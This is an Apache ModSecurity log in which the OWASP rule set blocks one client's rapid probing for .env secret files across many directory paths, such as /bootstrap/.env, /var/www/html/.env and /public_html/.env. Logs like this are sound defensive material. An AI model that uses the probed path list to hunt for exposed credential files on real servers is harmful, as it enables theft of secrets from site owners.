[Mon May 11 18:03:09.527265 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/application/.env"] [unique_id "agH9vUWKUxpmnkK7zHyhnQAAAQQ"]
[Mon May 11 18:03:09.527560 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vUWKUxpmnkK7zHyhnQAAAQQ"]
[Mon May 11 18:03:09.963853 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/bootstrap/.env"] [unique_id "agH9vUWKUxpmnkK7zHyhngAAAQQ"]
[Mon May 11 18:03:09.964086 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/bootstrap/.env"] [unique_id "agH9vUWKUxpmnkK7zHyhngAAAQQ"]
[Mon May 11 18:03:09.964421 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vUWKUxpmnkK7zHyhngAAAQQ"]
[Mon May 11 18:03:10.125854 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/database/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhnwAAAQQ"]
[Mon May 11 18:03:10.126085 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/database/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhnwAAAQQ"]
[Mon May 11 18:03:10.126379 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vkWKUxpmnkK7zHyhnwAAAQQ"]
[Mon May 11 18:03:10.422600 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/storage/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhoQAAAQQ"]
[Mon May 11 18:03:10.422844 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/storage/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhoQAAAQQ"]
[Mon May 11 18:03:10.447511 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vkWKUxpmnkK7zHyhoQAAAQQ"]
[Mon May 11 18:03:10.597600 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/var/www/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhogAAAQQ"]
[Mon May 11 18:03:10.597846 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/var/www/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhogAAAQQ"]
[Mon May 11 18:03:10.598172 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vkWKUxpmnkK7zHyhogAAAQQ"]
[Mon May 11 18:03:10.760499 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/var/www/html/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhowAAAQQ"]
[Mon May 11 18:03:10.760731 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/var/www/html/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhowAAAQQ"]
[Mon May 11 18:03:10.761020 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vkWKUxpmnkK7zHyhowAAAQQ"]
[Mon May 11 18:03:10.926281 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/current/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhpAAAAQQ"]
[Mon May 11 18:03:10.926505 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/current/.env"] [unique_id "agH9vkWKUxpmnkK7zHyhpAAAAQQ"]
[Mon May 11 18:03:10.926819 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9vkWKUxpmnkK7zHyhpAAAAQQ"]
[Mon May 11 18:03:11.166219 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/release/.env"] [unique_id "agH9v0WKUxpmnkK7zHyhpQAAAQQ"]
[Mon May 11 18:03:11.166449 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/release/.env"] [unique_id "agH9v0WKUxpmnkK7zHyhpQAAAQQ"]
[Mon May 11 18:03:11.166742 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9v0WKUxpmnkK7zHyhpQAAAQQ"]
[Mon May 11 18:03:11.525680 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/releases/.env"] [unique_id "agH9v0WKUxpmnkK7zHyhqAAAAQQ"]
[Mon May 11 18:03:11.525886 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/releases/.env"] [unique_id "agH9v0WKUxpmnkK7zHyhqAAAAQQ"]
[Mon May 11 18:03:11.545229 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9v0WKUxpmnkK7zHyhqAAAAQQ"]
[Mon May 11 18:03:11.697616 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/shared/.env"] [unique_id "agH9v0WKUxpmnkK7zHyhqQAAAQQ"]
[Mon May 11 18:03:11.697844 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/shared/.env"] [unique_id "agH9v0WKUxpmnkK7zHyhqQAAAQQ"]
[Mon May 11 18:03:11.698137 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9v0WKUxpmnkK7zHyhqQAAAQQ"]
[Mon May 11 18:03:12.040707 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /deploy/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/deploy/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhqgAAAQQ"]
[Mon May 11 18:03:12.040928 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/deploy/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhqgAAAQQ"]
[Mon May 11 18:03:12.041207 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wEWKUxpmnkK7zHyhqgAAAQQ"]
[Mon May 11 18:03:12.218630 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/build/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhrAAAAQQ"]
[Mon May 11 18:03:12.218863 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/build/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhrAAAAQQ"]
[Mon May 11 18:03:12.219217 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wEWKUxpmnkK7zHyhrAAAAQQ"]
[Mon May 11 18:03:12.375736 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dist/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhrQAAAQQ"]
[Mon May 11 18:03:12.376080 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dist/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhrQAAAQQ"]
[Mon May 11 18:03:12.376537 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9wEWKUxpmnkK7zHyhrQAAAQQ"]
[Mon May 11 18:03:12.647096 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/public_html/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhrgAAAQQ"]
[Mon May 11 18:03:12.647351 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/public_html/.env"] [unique_id "agH9wEWKUxpmnkK7zHyhrgAAAQQ"]
